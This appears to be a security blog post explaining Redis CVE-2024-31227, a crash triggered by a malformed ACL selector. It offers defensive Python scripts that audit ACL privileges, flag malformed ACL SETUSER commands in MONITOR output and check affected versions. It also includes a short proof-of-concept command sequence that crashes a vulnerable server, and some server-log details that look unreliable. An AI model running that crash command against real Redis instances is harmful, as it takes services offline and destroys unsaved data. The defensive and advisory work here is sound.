Redis is a super fast, open-source, in-memory database used by millions of developers around the world. Systems and apps rely on Redis for caching, message queues, and much more. But what happens when a security issue can take the whole database offline with just a single command? That’s precisely the danger of CVE-2024-31227.

Let’s break down what happened, how it works, and what you should do right away—especially if you run Redis 7 before version 7.2.6 or 7.4.1.

What Is CVE-2024-31227?

CVE-2024-31227 is a critical denial-of-service vulnerability found in Redis, one of the world’s most popular open-source databases. The bug is all about how Redis handles ACL (Access Control List) selectors—the rules that decide what users can and can’t do.

If a logged-in user with enough privilege to change ACLs sends a malformed ACL selector, it can cause a server panic. In plain English: Redis crashes instantly, and anything held only in memory (not yet written to an RDB snapshot or the AOF) is lost with it.

Affected versions: Redis 7 before 7.2.6, and Redis 7.4 before 7.4.1.

Who is at risk:

- Anyone running Redis with authentication (named users) and ACLs in production.
- An attacker needs a valid account with enough privilege to change ACLs, but shared, multi-tenant and cloud deployments often hand such accounts to many people and services.
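Since only accounts that may run ACL SETUSER can reach the vulnerable code path, the first defensive step is to find out which accounts those are. The following script is an added example, not code from the article or from the Redis project: it parses lines in the shape of Redis 7 `ACL LIST` output (the sample lines, user names and password hashes are constructed) and reports every enabled user whose root rules or any selector leave ACL SETUSER allowed. The category handling is deliberately narrow: it only tracks the tokens that affect the ACL command (which sits in @admin, @slow and @dangerous), applied left to right as Redis does.

```python
import re

# Constructed sample in the shape of Redis 7 `ACL LIST` output; user names and
# password hashes are made up for this example.
FAKE_HASH = "#" + "ab" * 32  # stand-in for the SHA-256 password hash Redis prints
SAMPLE_ACL_LIST = [
    "user default on nopass sanitize-payload ~* &* +@all",
    f"user cache-app on {FAKE_HASH} ~cache:* resetchannels -@all +get +set +del",
    f"user ops on {FAKE_HASH} ~* &* -@all +@admin",
    f"user reporter on {FAKE_HASH} ~* &* -@all +@read (+acl|setuser ~*)",
    f"user retired off {FAKE_HASH} ~* &* +@all",
]

# ACL SETUSER belongs to the @admin, @slow and @dangerous categories, so any of
# these tokens grants or revokes it. Rules apply left to right; later ones win.
GRANT = {"+@all", "+@admin", "+@slow", "+@dangerous", "+acl", "+acl|setuser", "allcommands"}
REVOKE = {"-@all", "-@admin", "-@slow", "-@dangerous", "-acl", "-acl|setuser", "nocommands"}

SELECTOR = re.compile(r"\(([^)]*)\)")  # a selector is a rule set in parentheses


def rules_allow_setuser(tokens):
    """Walk one rule set left to right and return whether ACL SETUSER ends up allowed."""
    allowed = False
    for tok in tokens:
        if tok in GRANT:
            allowed = True
        elif tok in REVOKE:
            allowed = False
    return allowed


def parse_acl_list_line(line):
    """Split an ACL LIST line into (name, enabled, root rules, list of selector rule sets)."""
    parts = line.split()
    if len(parts) < 3 or parts[0] != "user":
        raise ValueError(f"not an ACL LIST line: {line!r}")
    name, enabled = parts[1], parts[2] == "on"
    rest = " ".join(parts[3:])
    selectors = [m.group(1).split() for m in SELECTOR.finditer(rest)]
    root = SELECTOR.sub(" ", rest).split()
    return name, enabled, root, selectors


def can_modify_acls(line):
    """True if the user is enabled and the root rules or any selector permit ACL SETUSER."""
    _, enabled, root, selectors = parse_acl_list_line(line)
    if not enabled:
        return False
    return rules_allow_setuser(root) or any(rules_allow_setuser(s) for s in selectors)


def users_able_to_modify_acls(acl_list_lines):
    """Names of the accounts that could reach the vulnerable code path."""
    return [parse_acl_list_line(l)[0] for l in acl_list_lines if can_modify_acls(l)]


if __name__ == "__main__":
    for name in users_able_to_modify_acls(SAMPLE_ACL_LIST):
        print(f"{name}: can run ACL SETUSER, review whether this account needs it")
```

Feed it real output with `redis-cli ACL LIST` and treat every name it prints as an account that should be reduced to what it actually needs; the `reporter` sample shows why selectors matter, because a narrow root rule set can still carry a selector that hands out the ACL command.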

How Does the Exploit Work?

The vulnerability sits in the ACL code. If you add or edit a user ACL selector with bad formatting, Redis doesn’t handle the error. Instead, it panics, crashes immediately, and stops responding. Any cache, job queue, or app relying on Redis is suddenly offline.

Redis stores a user's permissions as ACL rules, and since Redis 7 additional rule sets, called "selectors", can be attached in parentheses. A rule looks like this:

ACL SETUSER dangerous_user +@all ~* &(*)

With the vulnerability, a "selector" string that isn't valid is still accepted and processed:

ACL SETUSER exploiter +@all &(*))  # Notice extra ")"

When Redis tries to use that user's ACLs (say, when the user logs in or runs a command), it tries to parse the invalid selector, panics, and crashes.
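On the detection side, every ACL write is worth logging on an instance that cannot be patched yet, and a SETUSER whose rule text has unbalanced parentheses (the extra ")" the article shows) deserves an immediate alert. The script below is an added example, not part of the article or of Redis: it reads lines in the format `redis-cli MONITOR` prints (the sample lines, client addresses and commands are constructed), picks out `ACL SETUSER` and `ACL LOAD`, and raises the severity when a SETUSER argument is syntactically broken.

```python
import re

# Constructed MONITOR lines (redis-cli format: timestamp [db client] "arg" "arg" ...);
# the addresses and commands are made up for this example. The third line carries
# the malformed selector from the article, with an extra ")".
SAMPLE_MONITOR = [
    '1728300000.100000 [0 10.0.0.5:51000] "GET" "cache:user:42"',
    '1728300001.200000 [0 10.0.0.9:51010] "ACL" "SETUSER" "reporter" "+@read" "~reports:*"',
    '1728300002.300000 [0 10.0.0.9:51011] "ACL" "SETUSER" "hacked" "+@all" "&(*))"',
    '1728300003.400000 [0 10.0.0.5:51001] "SET" "cache:user:42" "{\\"id\\":42}"',
]

MONITOR_LINE = re.compile(r'^\+?(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
ARG = re.compile(r'"((?:\\.|[^"\\])*)"')  # one double-quoted argument, escapes allowed
ACL_WRITE_SUBCOMMANDS = {"SETUSER", "LOAD"}  # both feed rule text into the ACL parser


def parse_monitor_line(line):
    """Return (client, [args]) for a MONITOR line, or None if the line is not one."""
    m = MONITOR_LINE.match(line.strip())
    if not m:
        return None
    args = [a.replace('\\"', '"') for a in ARG.findall(m.group("args"))]
    return m.group("client"), args


def parens_balanced(text):
    """Selectors are parenthesised rule sets, so a stray ')' or '(' means malformed input."""
    depth = 0
    for ch in text:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return False
    return depth == 0


def review_monitor_lines(lines):
    """Flag every ACL write; raise severity when a SETUSER argument is syntactically broken."""
    findings = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        client, args = parsed
        if len(args) < 2 or args[0].upper() != "ACL" or args[1].upper() not in ACL_WRITE_SUBCOMMANDS:
            continue
        rule_args = args[3:] if args[1].upper() == "SETUSER" else []
        malformed = not all(parens_balanced(a) for a in rule_args)
        findings.append({
            "client": client,
            "command": " ".join(args[:3]),
            "severity": "high" if malformed else "info",
        })
    return findings


if __name__ == "__main__":
    for f in review_monitor_lines(SAMPLE_MONITOR):
        print(f"[{f['severity']}] {f['client']} ran {f['command']}")
```

MONITOR costs throughput on a busy instance, so run it for a bounded window or from a dedicated client; the "info" findings are still useful, because on most deployments ACL changes should only ever come from a known administration host.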

Example Proof of Concept

# 1. Log in as an admin or user with WRITE access to ACLs
redis-cli

# 2. Add a user with a malformed ACL selector
ACL SETUSER hacked +@all &(*))

# 3. Authenticate as hacked user or cause Redis to process ACLs for this user
AUTH hacked somepassword

# 4. At this point, if vulnerable, REDIS WILL CRASH

On the server side, you may see something like

* FATAL CONFIG FILE ERROR *
Reading the ACL selector for user 'hacked', Redis panicked.

Update Redis Immediately!

- If you run Redis 7.0 or 7.2, upgrade to 7.2.6; if you run Redis 7.4.0, upgrade to 7.4.1.
- Until you can upgrade, restrict the ACL command to the accounts that genuinely need to manage users, since only they can trigger the crash.
- Download the fixed versions:
  - Redis 7.2.6 release
  - Redis 7.4.1 release
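Checking the running version is a one-minute job, but it is easy to misread a release number under pressure, so here is a small checker as an added example (not code from the article or from Redis). It reads the `INFO server` section (the sample text is constructed), extracts `redis_version`, and compares it against the ranges the advisory gives above; the script name in the comment is a placeholder.

```python
import re
import sys

# Constructed `INFO server` excerpt; every value here is made up for the example.
SAMPLE_INFO = """# Server
redis_version:7.2.5
redis_git_sha1:00000000
redis_mode:standalone
os:Linux 6.1.0 x86_64
tcp_port:6379
"""

# Vulnerable ranges as the advisory states them: Redis 7 before 7.2.6, and 7.4 before 7.4.1.
AFFECTED_RANGES = [((7, 0, 0), (7, 2, 6)), ((7, 4, 0), (7, 4, 1))]


def parse_version(text):
    """'7.2.5' -> (7, 2, 5); anything after the third number is ignored."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised Redis version: {text!r}")
    return tuple(int(x) for x in m.groups())


def version_from_info(info_text):
    """Pull redis_version out of INFO output; the section header and other keys are skipped."""
    for line in info_text.splitlines():
        if line.startswith("redis_version:"):
            return line.split(":", 1)[1].strip()
    raise ValueError("redis_version not present in INFO output")


def is_affected(version_text):
    """True when the version falls inside one of the advisory's vulnerable ranges."""
    v = parse_version(version_text)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def recommended_upgrade(version_text):
    """Target release for an affected version, or None if no upgrade is needed for this CVE."""
    if not is_affected(version_text):
        return None
    return "7.4.1" if parse_version(version_text) >= (7, 4, 0) else "7.2.6"


if __name__ == "__main__":
    # Pipe real output in: redis-cli INFO server | python3 check_redis_version.py  (placeholder name)
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_INFO
    ver = version_from_info(text)
    target = recommended_upgrade(ver)
    print(f"redis {ver}: " + (f"affected, upgrade to {target}" if target else "not in the affected ranges"))
```

Interim numbers such as 7.3.x belong to pre-release builds that the ranges above do not cover, so the checker reports them as not affected; treat any such build as one to replace with a release version rather than as safe.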

More Info

- CVE Details
- Official Advisory
- Redis Changelog

Conclusion

CVE-2024-31227 is a reminder that even the simplest configuration error in a complex system like Redis can have massive consequences. If you manage Redis servers—especially in shared or multi-user environments—upgrading isn’t optional, it’s urgent.

Double-check your Redis version today, and keep your production data safe!

Timeline

Published on: 10/07/2024 20:15:05 UTC
Last modified on: 10/10/2024 12:57:21 UTC